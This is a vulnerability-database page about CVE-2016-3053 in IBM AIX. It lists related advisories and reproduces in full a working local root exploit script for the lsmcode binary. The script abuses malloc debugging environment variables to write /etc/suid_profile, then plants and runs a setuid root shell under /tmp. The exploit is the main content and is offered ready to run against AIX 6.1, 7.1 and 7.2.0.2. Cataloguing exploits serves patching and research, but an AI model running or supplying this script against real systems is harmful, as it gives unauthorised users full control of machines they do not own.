Vulners
Lucene search
IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Privilege Escalation Exploit
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | AIX 6.1 TL 9 : lsmcode (IV87794) | 18 Oct 201600:00 | – | nessus |
| AIX 7.1 TL 4 : lsmcode (IV88007) | 18 Oct 201600:00 | – | nessus |
| AIX 7.2 TL 0 : lsmcode (IV88042) | 18 Oct 201600:00 | – | nessus |
| AIX 7.1 TL 3 : lsmcode (IV88457) | 18 Oct 201600:00 | – | nessus |
 | CVE-2016-3053 | 4 Nov 201600:00 | – | circl |
 | IBM AIX Local Elevation of Privilege Vulnerability | 20 Oct 201600:00 | – | cnvd |
 | CVE-2016-3053 | 1 Feb 201720:00 | – | cve |
 | CVE-2016-3053 | 1 Feb 201720:00 | – | cvelist |
 | EUVD-2016-4126 | 7 Oct 202500:30 | – | euvd |
 | Vulnerability in lsmcode affects AIX,Vulnerability in lsmcode affects VIOS | 17 Oct 201608:54 | – | aix |
10
#!/usr/bin/sh
#
# AIX lsmcode local root exploit.
#
# Affected: AIX 6.1/7.1/7.2.0.2
#
# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/
#
# lqueryroot.sh by @hxmonsegur [2016 //RSL]
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
if [ ! -x "/usr/sbin/lsmcode" ]; then
echo "[-] lsmcode isn't executable. Exploit failed."
exit 1
fi
echo "[*] [lsmcode] AIX 6.1/7.1/7.2.0.2 Privilege escalation by @hxmonsegur //RSL"
echo "[*] Current id: `/usr/bin/id`"
echo "[*] Exporting variables"
MALLOCOPTIONS=buckets
MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile
export MALLOCOPTIONS MALLOCBUCKETS
echo "[*] Setting umask to 000"
umask 000
echo "[*] Executing vulnerable binary [lsmcode]"
/usr/sbin/lsmcode -c >/dev/null 2>&1
if [ ! -e "/etc/suid_profile" ]; then
echo "[-] /etc/suid_profile does not exist and exploit failed."
exit 1
fi
echo "[*] Cleaning up /etc/suid_profile"
echo > /etc/suid_profile
echo "[*] Preparing escalation"
cat << EOF >/etc/suid_profile
cp /bin/ksh $ROOTSHELL
/usr/bin/syscall setreuid 0 0
chown root:system $ROOTSHELL
chmod 6755 $ROOTSHELL
rm /etc/suid_profile
EOF
echo "[*] Cleaning up environment variables"
unset MALLOCBUCKETS MALLOCOPTIONS
echo "[*] Escalating"
/usr/bin/ibstat -a >/dev/null 2>&1
if [ ! -e "$ROOTSHELL" ]; then
echo "[-] Rootshell does not exist and exploit failed."
exit 1
fi
echo "[*] Executing rootshell"
$ROOTSHELL
echo "[*] Make sure to remove $ROOTSHELL"
# 0day.today [2018-01-03] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Nov 2016 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.03041